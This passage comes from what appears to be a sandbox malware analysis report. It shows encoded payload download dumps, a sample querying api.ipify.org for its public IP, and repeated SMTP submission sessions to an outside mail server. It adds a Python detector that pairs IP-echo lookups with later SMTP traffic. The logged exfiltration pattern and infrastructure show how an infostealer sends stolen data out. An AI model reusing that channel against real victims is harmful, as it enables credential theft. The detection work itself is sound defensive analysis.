Data Ascii: pq6lWSOnsUsfGxoTECAUJBUWIRghJyYXHyYQGhMUDg4WJR0eFA4WIB4SDg8UHxkOICUaHaaupVkjp7FLVSIeGiEaJg4RJiamrqVZI6exS156eXJvX3NjdHVgd2BmZXZeZW95cnNtbXVkXF1zbXVfXXFtbnNeeG1fZHlcXnp5cm9fc2N0dWB3YGZldl5lb3lyc21tdWRcXXNtdV9dcW1uc154bV9keVxeenlyb19zY3R1YHdgZmV2XmVveXJzbW1
2024-11-26 07:12:13 UTC | 14994 | IN | Data Raw: 6d 5a 58 5a 65 5a 57 39 35 63 6e 4e 74 62 58 56 6b 58 46 31 7a 62 58 56 66 58 58 46 74 62 6e 4e 65 65 47 31 66 5a 48 6c 63 58 6e 70 35 63 6d 39 66 63 32 4e 30 64 57 42 33 59 47 5a 6c 64 6c 35 6c 62 33 6c 79 63 32 31 74 64 57 52 63 58 58 4e 74 64 56 39 64 63 57 31 75 63 31 35 34 62 56 39 6b 65 56 78 65 65 6e 6c 79 62 31 39 7a 59 33 52 31 59 48 64 67 5a 6d 56 32 58 6d 56 76 65 58 4a 7a 62 57 31 31 5a 46 78 64 63 32 31 31 58 31 31 78 62 57 35 7a 58 6e 68 74 58 32 52 35 58 46 35 36 65 58 4a 76 58 33 4e 6a 64 48 56 67 64 32 42 6d 5a 58 5a 65 5a 57 39 35 63 72 42 53 61 43 31 72 59 32 47 4e 5a 56 39 77 33 6f 56 6d 37 57 78 68 64 7a 6c 33 61 33 5a 67 46 47 4a 32 62 58 4d 4f 61 31 78 37 65 37 52 66 5a 7a 78 52 63 43 6e 43 4f 57 6f 34 42 5a 57 74 39 6d 77 72 30 54
Data Ascii: mZXZeZW95cnNtbXVkXF1zbXVfXXFtbnNeeG1fZHlcXnp5cm9fc2N0dWB3YGZldl5lb3lyc21tdWRcXXNtdV9dcW1uc154bV9keVxeenlyb19zY3R1YHdgZmV2XmVveXJzbW11ZFxdc211X11xbW5zXnhtX2R5XF56eXJvX3NjdHVgd2BmZXZeZW95crBSaC1rY2GNZV9w3oVm7Wxhdzl3a3ZgFGJ2bXMOa1x7e7RfZzxRcCnCOWo4BZWt9mwr0T
2024-11-26 07:12:13 UTC | 16384 | IN | Data Raw: 68 68 67 61 33 56 6c 62 73 57 45 79 75 6e 73 4c 6e 36 54 38 70 4c 2b 48 58 5a 6c 4f 4c 78 63 56 39 51 77 66 51 62 34 6b 57 71 72 69 59 4c 76 72 74 67 74 2f 50 44 4c 30 6c 57 4d 6d 2b 37 2b 6a 4d 4a 68 64 6a 49 61 62 47 4e 35 32 45 71 61 38 72 77 59 41 6c 68 7a 48 35 4f 4f 36 55 39 37 2f 36 56 37 33 4b 4b 69 4b 68 6d 74 58 5a 55 69 44 55 64 70 4e 6e 39 57 2b 65 58 69 4c 32 46 31 63 55 67 58 69 30 62 64 45 74 32 36 4c 39 2f 46 41 49 4d 6a 64 59 59 57 59 6c 56 66 4b 47 77 70 6d 6e 6d 30 63 6e 70 67 59 6d 61 79 36 62 52 70 4c 68 73 64 6d 42 72 44 33 45 50 4a 30 75 54 53 68 48 62 53 6a 74 2f 68 61 72 6b 71 5a 68 32 4b 4c 64 39 75 6a 42 45 6b 4f 48 2b 32 6e 72 54 70 45 32 44 56 62 45 35 51 2b 41 54 52 54 6d 35 50 50 63 62 5a 6e 38 63 7a 4f 43 59 4c 2f 58 74 79
Data Ascii: hhga3VlbsWEyunsLn6T8pL+HXZlOLxcV9QwfQb4kWqriYLvrtgt/PDL0lWMm+7+jMJhdjIabGN52Eqa8rwYAlhzH5OO6U97/6V73KKiKhmtXZUiDUdpNn9W+eXiL2F1cUgXi0bdEt26L9/FAIMjdYYWYlVfKGwpmnm0cnpgYmay6bRpLhsdmBrD3EPJ0uTShHbSjt/harkqZh2KLd9ujBEkOH+2nrTpE2DVbE5Q+ATRTm5PPcbZn8czOCYL/Xty
2024-11-26 07:12:13 UTC | 16384 | IN | Data Raw: 6e 65 53 66 4d 35 35 67 71 4c 6c 4d 61 58 49 68 6f 73 71 74 44 4c 52 65 6d 74 32 52 6d 69 7a 55 63 4a 42 49 73 41 6a 76 57 44 54 4e 59 72 6e 45 2f 31 58 71 31 71 5a 6e 72 72 4a 68 49 73 35 68 44 4f 2f 65 2b 59 55 39 48 79 43 6a 5a 7a 53 48 38 59 6a 34 55 2f 78 47 6a 38 38 32 6f 53 70 36 4d 41 51 62 72 2b 7a 50 68 35 33 70 2b 32 71 48 59 37 39 63 49 6e 58 38 62 65 67 6e 46 39 70 58 41 41 6f 67 55 72 33 46 2f 2b 6e 4f 65 70 4c 43 59 71 34 46 6e 70 67 71 4f 6b 5a 35 35 64 57 37 56 4c 2f 4d 67 76 59 5a 51 31 32 62 58 62 77 45 48 50 54 38 79 79 4c 63 4c 69 53 71 65 37 64 4f 4b 4f 54 39 61 36 73 65 6d 74 6f 43 71 64 6b 6c 74 38 68 74 6e 44 70 4e 56 70 5a 2f 36 51 64 6c 6d 66 57 63 37 30 31 72 69 78 57 4d 6e 32 62 69 31 35 2b 61 69 65 35 53 36 67 49 6c 39 4a 6a
Data Ascii: neSfM55gqLlMaXIhosqtDLRemt2RmizUcJBIsAjvWDTNYrnE/1Xq1qZnrrJhIs5hDO/e+YU9HyCjZzSH8Yj4U/xGj882oSp6MAQbr+zPh53p+2qHY79cInX8begnF9pXAAogUr3F/+nOepLCYq4FnpgqOkZ55dW7VL/MgvYZQ12bXbwEHPT8yyLcLiSqe7dOKOT9a6semtoCqdklt8htnDpNVpZ/6QdlmfWc701rixWMn2bi15+aie5S6gIl9Jj
2024-11-26 07:12:13 UTC | 16384 | IN | Data Raw: 70 32 70 62 59 66 5a 2b 36 33 55 78 64 34 51 69 64 51 6d 4e 78 68 37 4c 65 47 74 30 34 32 5a 44 6d 72 4c 6f 4e 70 6d 63 59 58 2f 73 6a 71 67 75 42 6c 38 32 62 69 7a 68 39 73 78 2b 43 31 4b 6d 4f 52 59 59 4b 64 50 49 6d 35 76 7a 68 2b 67 36 43 6b 57 64 62 61 7a 68 78 52 44 72 2f 57 43 31 73 32 55 5a 4e 37 32 66 54 38 55 61 2b 52 64 56 76 6d 33 75 52 77 75 4f 64 4a 70 55 66 4a 70 6c 6d 50 4a 6d 48 76 6c 6d 66 52 4f 55 2f 4d 6b 43 69 44 45 71 43 7a 74 56 30 76 42 57 67 73 54 77 49 33 2b 59 74 56 77 54 56 42 4b 6f 62 65 70 61 4f 6a 61 6d 41 4e 37 30 2f 4b 53 74 66 6c 49 67 70 46 2f 73 65 32 57 67 31 4e 63 63 70 32 65 32 78 7a 6a 55 6e 71 44 62 64 38 41 77 72 30 69 39 67 55 6a 58 44 30 65 46 62 32 4a 4a 6e 56 6d 4c 64 46 56 6a 76 51 57 47 43 6e 44 7a 47 4c 4a
Data Ascii: p2pbYfZ+63Uxd4QidQmNxh7LeGt042ZDmrLoNpmcYX/sjqguBl82bizh9sx+C1KmORYYKdPIm5vzh+g6CkWdbazhxRDr/WC1s2UZN72fT8Ua+RdVvm3uRwuOdJpUfJplmPJmHvlmfROU/MkCiDEqCztV0vBWgsTwI3+YtVwTVBKobepaOjamAN70/KStflIgpF/se2Wg1Nccp2e2xzjUnqDbd8Awr0i9gUjXD0eFb2JJnVmLdFVjvQWGCnDzGLJ
2024-11-26 07:12:13 UTC | 16384 | IN | Data Raw: 6c 52 6b 30 52 51 4c 57 67 66 47 58 71 4c 6a 64 58 66 34 39 49 4e 63 43 62 4a 4f 30 77 73 68 61 35 6e 2b 68 47 2f 68 55 31 32 6a 56 7a 66 49 69 36 42 45 71 48 35 2f 2f 46 6c 75 6a 75 2f 49 6b 6c 51 50 78 6e 55 41 72 30 74 6a 30 78 73 67 45 69 75 33 32 51 48 75 59 37 31 4d 66 52 6d 35 69 30 5a 61 59 71 42 78 69 71 49 4b 34 50 48 78 66 48 48 46 44 61 4f 4c 2b 6e 54 79 56 77 6b 77 63 48 4d 42 6f 51 47 6a 49 59 77 67 77 65 50 65 30 73 68 37 51 57 59 5a 7a 77 48 67 48 65 4e 54 79 51 5a 74 65 4a 31 79 75 63 56 6e 59 58 70 79 65 47 62 4b 53 30 4f 69 41 76 43 41 6f 76 4e 76 67 63 76 50 35 57 35 74 50 46 39 38 6f 43 49 77 2f 56 6c 6e 58 70 75 6f 4c 76 30 4a 74 67 59 46 65 67 76 32 70 4e 7a 71 34 37 35 39 4c 6d 33 39 59 43 53 65 75 38 6f 54 42 6d 6a 39 4c 48 50 72
Data Ascii: lRk0RQLWgfGXqLjdXf49INcCbJO0wsha5n+hG/hU12jVzfIi6BEqH5//Fluju/IklQPxnUAr0tj0xsgEiu32QHuY71MfRm5i0ZaYqBxiqIK4PHxfHHFDaOL+nTyVwkwcHMBoQGjIYwgwePe0sh7QWYZzwHgHeNTyQZteJ1yucVnYXpyeGbKS0OiAvCAovNvgcvP5W5tPF98oCIw/VlnXpuoLv0JtgYFegv2pNzq4759Lm39YCSeu8oTBmj9LHPr
2024-11-26 07:12:13 UTC | 16384 | IN | Data Raw: 48 39 68 65 71 50 59 36 4a 2b 6c 49 36 50 48 5a 33 58 59 67 34 77 31 38 50 35 77 65 45 47 75 32 74 42 6c 45 74 76 37 62 59 76 79 33 45 4e 7a 56 45 61 61 51 54 34 44 39 49 67 68 57 5a 5a 53 6a 58 4e 74 4d 47 78 5a 54 4a 42 72 77 49 44 51 6c 37 78 30 30 58 50 6c 50 4e 6a 62 7a 6f 7a 4a 36 4a 4e 73 63 35 71 6b 32 69 43 79 38 35 45 50 31 4b 52 46 75 48 39 2f 42 4c 76 6c 53 41 6b 37 32 56 78 57 65 4d 58 35 54 52 30 2b 47 4e 34 79 6b 32 74 74 62 59 65 33 74 77 4c 36 4f 62 73 43 77 56 64 43 33 6d 33 46 4c 70 52 33 62 4d 62 32 57 32 4f 62 42 42 78 44 42 55 4f 62 70 2b 6a 36 58 54 79 43 6d 2b 52 59 54 57 56 45 53 6b 42 6c 66 67 2b 71 56 47 50 68 61 69 74 54 2b 6a 32 47 45 47 36 6a 2b 4d 61 39 38 77 4d 7a 42 33 45 79 54 75 50 49 75 5a 4b 57 4a 58 59 48 6d 76 46 70
Data Ascii: H9heqPY6J+lI6PHZ3XYg4w18P5weEGu2tBlEtv7bYvy3ENzVEaaQT4D9IghWZZSjXNtMGxZTJBrwIDQl7x00XPlPNjbzozJ6JNsc5qk2iCy85EP1KRFuH9/BLvlSAk72VxWeMX5TR0+GN4yk2ttbYe3twL6ObsCwVdC3m3FLpR3bMb2W2ObBBxDBUObp+j6XTyCm+RYTWVESkBlfg+qVGPhaitT+j2GEG6j+Ma98wMzB3EyTuPIuZKWJXYHmvFp
2024-11-26 07:12:13 UTC | 16384 | IN | Data Raw: 79 74 67 57 48 53 65 57 32 67 78 75 74 79 44 68 53 32 54 4c 53 57 2b 62 4a 37 69 58 46 47 50 54 7a 49 75 50 32 50 49 59 4a 32 2b 2b 45 58 46 6e 62 75 57 65 70 58 4b 33 62 33 65 37 70 33 72 48 33 74 65 5a 70 6c 51 64 4b 61 2b 62 52 56 70 4f 51 63 6c 47 34 74 47 2f 52 67 2b 59 35 6b 33 76 66 64 67 57 37 6f 36 6d 62 4f 4f 50 49 66 46 65 65 31 62 67 70 6b 55 39 6a 6d 6d 78 6d 44 52 61 59 78 68 43 37 77 69 43 67 68 78 77 4f 7a 30 4f 4b 52 6a 50 4b 73 2f 71 64 55 36 65 57 66 6d 59 6b 70 68 64 74 37 63 62 72 67 74 67 33 54 38 76 49 6a 47 79 2b 34 46 55 6b 4f 4d 69 65 6e 56 6a 46 65 55 78 79 69 38 63 30 36 59 69 33 33 4c 44 31 46 74 53 33 55 37 58 59 6f 67 58 46 34 33 64 78 48 47 43 55 66 31 36 51 5a 74 75 58 44 65 47 45 33 59 70 37 38 63 4b 4b 66 49 57 58 52 71
Data Ascii: ytgWHSeW2gxutyDhS2TLSW+bJ7iXFGPTzIuP2PIYJ2++EXFnbuWepXK3b3e7p3rH3teZplQdKa+bRVpOQclG4tG/Rg+Y5k3vfdgW7o6mbOOPIfFee1bgpkU9jmmxmDRaYxhC7wiCghxwOz0OKRjPKs/qdU6eWfmYkphdt7cbrgtg3T8vIjGy+4FUkOMienVjFeUxyi8c06Yi33LD1FtS3U7XYogXF43dxHGCUf16QZtuXDeGE3Yp78cKKfIWXRq
2024-11-26 07:12:13 UTC | 16384 | IN | Data Raw: 38 77 7a 44 56 31 71 6b 2b 43 49 53 64 32 35 68 57 6a 68 74 6f 45 6b 63 6d 35 32 56 68 54 6e 6f 49 42 6d 30 4e 4a 46 4c 65 74 66 44 33 78 56 73 76 68 6f 55 50 46 2b 52 43 31 6f 58 31 59 35 64 69 62 6a 6c 48 75 4c 65 4d 4e 30 65 2b 2b 31 33 50 6c 32 55 41 50 2f 54 4f 72 61 34 6c 30 67 6a 6d 37 63 46 46 2f 65 53 68 41 63 44 4f 6a 37 30 76 61 37 48 34 73 41 34 46 33 32 36 50 4b 36 64 61 54 67 38 79 30 34 63 64 49 65 43 30 4b 6d 54 44 38 61 48 6e 6d 2f 36 77 68 69 72 68 6f 75 31 6f 2f 4d 6d 57 76 30 76 76 42 77 6c 48 4f 6f 63 6e 68 54 39 54 4e 46 47 68 69 43 52 44 47 4c 62 79 62 45 31 50 68 6f 70 53 52 35 6e 72 76 66 5a 63 35 45 67 6e 50 62 39 65 51 43 77 6e 5a 49 5a 63 68 67 6f 71 52 39 75 4b 6d 4f 4f 34 4c 35 4e 4f 53 4b 54 38 76 34 45 4a 6c 44 50 61 54 51
Data Ascii: 8wzDV1qk+CISd25hWjhtoEkcm52VhTnoIBm0NJFLetfD3xVsvhoUPF+RC1oX1Y5dibjlHuLeMN0e++13Pl2UAP/TOra4l0gjm7cFF/eShAcDOj70va7H4sA4F326PK6daTg8y04cdIeC0KmTD8aHnm/6whirhou1o/MmWv0vvBwlHOocnhT9TNFGhiCRDGLbybE1PhopSR5nrvfZc5EgnPb9eQCwnZIZchgoqR9uKmOO4L5NOSKT8v4EJlDPaTQ
2024-11-26 07:12:13 UTC | 16384 | IN | Data Raw: 61 74 53 70 4c 30 31 4b 79 55 32 62 4a 46 44 74 6f 41 72 36 47 79 53 45 72 45 79 61 35 71 45 42 49 6c 67 56 50 2f 36 43 63 79 37 67 54 69 6c 62 32 36 4c 64 4c 52 6e 78 77 65 4c 49 42 6f 57 43 71 4e 67 71 77 71 4b 43 36 68 50 65 43 74 2f 65 78 57 48 4b 65 4f 6c 4c 53 4a 7a 37 72 41 73 63 4b 47 68 68 42 6e 53 37 6a 66 44 69 66 33 66 78 54 38 4c 6b 52 57 75 71 70 65 6c 32 43 2f 53 47 49 42 2b 2f 58 59 46 63 33 70 30 56 6a 2f 6d 57 4b 6b 44 5a 32 78 62 6f 34 4f 56 61 48 6b 51 52 31 49 35 4d 47 50 52 6c 58 6b 47 62 45 48 6d 32 52 32 61 6b 52 77 4b 33 6b 71 6c 63 2f 42 66 68 7a 35 65 6b 44 73 6e 58 6e 58 34 30 31 51 55 79 33 4b 6f 47 58 4f 75 78 61 52 4c 46 37 70 74 34 51 35 57 63 62 74 5a 43 69 63 56 76 57 4f 71 4e 59 43 50 6e 53 68 61 34 6d 59 5a 34 78 68 31
Data Ascii: atSpL01KyU2bJFDtoAr6GySErEya5qEBIlgVP/6Ccy7gTilb26LdLRnxweLIBoWCqNgqwqKC6hPeCt/exWHKeOlLSJz7rAscKGhhBnS7jfDif3fxT8LkRWuqpel2C/SGIB+/XYFc3p0Vj/mWKkDZ2xbo4OVaHkQR1I5MGPRlXkGbEHm2R2akRwK3kqlc/Bfhz5ekDsnXnX401QUy3KoGXOuxaRLF7pt4Q5WcbtZCicVvWOqNYCPnSha4mYZ4xh1


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49759 | 104.26.13.205 | 443 | 3976 | C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:12:32 UTC | 155 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
2024-11-26 07:12:32 UTC | 399 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 07:12:32 GMT
Content-Type: text/plain
Content-Length: 11
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 8e88121b1d5f41df-EWR
server-timing: cfL4;desc="?proto=TCP&rtt=1625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1887524&cwnd=252&unsent_bytes=0&cid=2088d30b37a11daf&ts=650&x=0"
2024-11-26 07:12:32 UTC | 11 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 8.46.123.75


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    2192.168.2.1049826104.26.13.2054437892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:13:01 UTC155OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                                                                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:13:01 UTC399INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:13:01 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 11
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                    CF-RAY: 8e8812cf9fbf43a6-EWR
                                                                                                                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1698&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1689814&cwnd=175&unsent_bytes=0&cid=cc0159779f4dc6ec&ts=450&x=0"
                                                                                                                                                                                                                                                                                                                                                    2024-11-26 07:13:01 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 8.46.123.75

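The HTTP and SMTP sessions in this section show the sequence a detection engineer would want to catch: the sample first asks api.ipify.org for its public address (8.46.123.75), then within seconds opens an SMTP submission session to 51.195.88.199:587 (s82.gocheapweb.com), sends EHLO and STARTTLS, and everything after "220 TLS go ahead" is encrypted. The following Python is an added example written for this page; it is not code from the Joe Sandbox report or from the sample. It correlates an IP-echo lookup with a following SMTP client command from the same internal host. The events are constructed from the sessions logged here, with the report's CET SMTP timestamps converted to UTC to match the HTTP table; the extra IP-echo hostnames, the 5-minute default window, the 192.168.2.11 lookup and the www.example.com request are assumptions added as coverage and negative controls, not data from the report.

```python
"""Correlate an external-IP lookup with a following SMTP submission, the
exfiltration prelude visible in the HTTP and SMTP sessions of this report."""
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Iterable

# Public IP-echo services that infostealers query to stamp the victim's public
# address into the stolen-data report. api.ipify.org is the host observed in
# this report; the other entries are assumptions added for coverage.
IP_ECHO_HOSTS = {"api.ipify.org", "icanhazip.com", "checkip.dyndns.org", "ifconfig.me"}

# SMTP relay, implicit-TLS and submission ports.
SMTP_PORTS = {25, 465, 587}


@dataclass(frozen=True)
class Event:
    """One logged network event. ts is UTC: the report prints its HTTP table in
    UTC but its SMTP table in CET, so timestamps are normalised before the two
    are correlated."""
    ts: datetime
    src_ip: str
    dst_ip: str
    dst_port: int
    proto: str     # "http" or "smtp"
    detail: str    # HTTP Host header, or the SMTP command/response line


def is_ip_echo_lookup(ev: Event) -> bool:
    return ev.proto == "http" and ev.detail.lower() in IP_ECHO_HOSTS


def is_smtp_client_command(ev: Event) -> bool:
    # Client-to-server direction: the destination port is the mail server's.
    return ev.proto == "smtp" and ev.dst_port in SMTP_PORTS


def find_exfil_candidates(events: Iterable[Event],
                          window_seconds: float = 300.0) -> list[tuple[Event, Event]]:
    """Return (lookup, smtp) pairs: an IP-echo lookup from an internal host
    followed, within window_seconds, by an SMTP client command from the same
    host. Only the first SMTP command after each lookup is paired, so each
    lookup yields at most one hit."""
    ordered = sorted(events, key=lambda e: e.ts)
    hits: list[tuple[Event, Event]] = []
    for i, lookup in enumerate(ordered):
        if not is_ip_echo_lookup(lookup):
            continue
        for later in ordered[i + 1:]:
            if (later.ts - lookup.ts).total_seconds() > window_seconds:
                break
            if later.src_ip == lookup.src_ip and is_smtp_client_command(later):
                hits.append((lookup, later))
                break
    return hits


def describe(hit: tuple[Event, Event]) -> str:
    lookup, smtp = hit
    gap = (smtp.ts - lookup.ts).total_seconds()
    return (f"{lookup.src_ip}: {lookup.detail} lookup at {lookup.ts:%H:%M:%S}Z, "
            f"then SMTP '{smtp.detail}' to {smtp.dst_ip}:{smtp.dst_port} {gap:.1f}s later")


def _utc(h: int, m: int, s: float) -> datetime:
    whole = int(s)
    return datetime(2024, 11, 26, h, m, whole, int(round((s - whole) * 1e6)),
                    tzinfo=timezone.utc)


# Constructed from the sessions logged in this report (SMTP CET values converted
# to UTC). The 192.168.2.11 lookup and the www.example.com request are added
# negative controls and must not be flagged.
SAMPLE_EVENTS = [
    Event(_utc(7, 12, 32.0), "192.168.2.10", "104.26.13.205", 443, "http", "api.ipify.org"),
    Event(_utc(7, 12, 38.241), "192.168.2.10", "51.195.88.199", 587, "smtp", "EHLO 179605"),
    Event(_utc(7, 12, 38.654), "192.168.2.10", "51.195.88.199", 587, "smtp", "STARTTLS"),
    Event(_utc(7, 12, 40.0), "192.168.2.11", "104.26.13.205", 443, "http", "api.ipify.org"),
    Event(_utc(7, 12, 45.0), "192.168.2.10", "203.0.113.10", 443, "http", "www.example.com"),
    Event(_utc(7, 13, 1.0), "192.168.2.10", "104.26.13.205", 443, "http", "api.ipify.org"),
    Event(_utc(7, 13, 7.645), "192.168.2.10", "51.195.88.199", 587, "smtp", "EHLO 179605"),
    Event(_utc(7, 13, 8.058), "192.168.2.10", "51.195.88.199", 587, "smtp", "STARTTLS"),
]

if __name__ == "__main__":
    for hit in find_exfil_candidates(SAMPLE_EVENTS):
        print(describe(hit))
```

Two caveats follow from the log itself. First, because the client issues STARTTLS and the server answers "220 TLS go ahead", the MAIL FROM, RCPT TO and DATA commands that carry the stolen data are never visible in the capture; the detection therefore keys on destination, port and ordering rather than message content, and on a real network the SMTP credentials would have to be recovered from the sample's configuration, not from the traffic. Second, the report's SMTP table is stamped in CET and its HTTP table in UTC (the Exim banner's own "+0000" confirms the server time), so any correlation across the two must normalise time zones first or the one-hour offset will silently defeat the window.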

Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 26, 2024 08:12:38.241041899 CET | 587 | 49774 | 51.195.88.199 | 192.168.2.10 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:12:38 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 26, 2024 08:12:38.241247892 CET | 49774 | 587 | 192.168.2.10 | 51.195.88.199 | EHLO 179605
Nov 26, 2024 08:12:38.654290915 CET | 587 | 49774 | 51.195.88.199 | 192.168.2.10 | 250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 26, 2024 08:12:38.654443026 CET | 49774 | 587 | 192.168.2.10 | 51.195.88.199 | STARTTLS
Nov 26, 2024 08:12:39.064027071 CET | 587 | 49774 | 51.195.88.199 | 192.168.2.10 | 220 TLS go ahead
Nov 26, 2024 08:13:07.644931078 CET | 587 | 49845 | 51.195.88.199 | 192.168.2.10 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:07 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 26, 2024 08:13:07.645417929 CET | 49845 | 587 | 192.168.2.10 | 51.195.88.199 | EHLO 179605
Nov 26, 2024 08:13:08.057960033 CET | 587 | 49845 | 51.195.88.199 | 192.168.2.10 | 250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 26, 2024 08:13:08.058149099 CET | 49845 | 587 | 192.168.2.10 | 51.195.88.199 | STARTTLS
Nov 26, 2024 08:13:08.470901012 CET | 587 | 49845 | 51.195.88.199 | 192.168.2.10 | 220 TLS go ahead
Nov 26, 2024 08:13:14.420069933 CET | 587 | 49866 | 51.195.88.199 | 192.168.2.10 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:13:14 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 26, 2024 08:13:14.421716928 CET | 49866 | 587 | 192.168.2.10 | 51.195.88.199 | EHLO 179605
Nov 26, 2024 08:13:14.843146086 CET | 587 | 49866 | 51.195.88.199 | 192.168.2.10 | 250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 26, 2024 08:13:14.843337059 CET | 49866 | 587 | 192.168.2.10 | 51.195.88.199 | STARTTLS
Nov 26, 2024 08:13:15.261038065 CET | 587 | 49866 | 51.195.88.199 | 192.168.2.10 | 220 TLS go ahead
Nov 26, 2024 08:14:50.843352079 CET | 587 | 50025 | 51.195.88.199 | 192.168.2.10 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:14:50 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 26, 2024 08:14:51.274379015 CET | 50025 | 587 | 192.168.2.10 | 51.195.88.199 | EHLO 179605
Nov 26, 2024 08:14:51.674194098 CET | 587 | 50025 | 51.195.88.199 | 192.168.2.10 | 250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Nov 26, 2024 08:14:51.674555063 CET | 50025 | 587 | 192.168.2.10 | 51.195.88.199 | STARTTLS
Nov 26, 2024 08:14:52.074881077 CET | 587 | 50025 | 51.195.88.199 | 192.168.2.10 | 220 TLS go ahead
Nov 26, 2024 08:15:25.643105030 CET | 587 | 50063 | 51.195.88.199 | 192.168.2.10 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:15:25 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 26, 2024 08:15:25.643810987 CET | 50063 | 587 | 192.168.2.10 | 51.195.88.199 | EHLO 179605
Nov 26, 2024 08:15:25.788229942 CET | 587 | 50064 | 51.195.88.199 | 192.168.2.10 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 26 Nov 2024 07:15:25 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Nov 26, 2024 08:15:25.788388014 CET | 50064 | 587 | 192.168.2.10 | 51.195.88.199 | EHLO 179605
Nov 26, 2024 08:15:26.046936989 CET | 587 | 50063 | 51.195.88.199 | 192.168.2.10 | 250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.047126055 CET50063587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.196666956 CET5875006451.195.88.199192.168.2.10250-s82.gocheapweb.com Hello 179605 [8.46.123.75]
                                                                                                                                                                                                                                                                                                                                                    250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                    250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                    250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                    250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                    250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                    250 HELP
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.196830988 CET50064587192.168.2.1051.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.450577021 CET5875006351.195.88.199192.168.2.10220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:26.605408907 CET5875006451.195.88.199192.168.2.10220 TLS go ahead
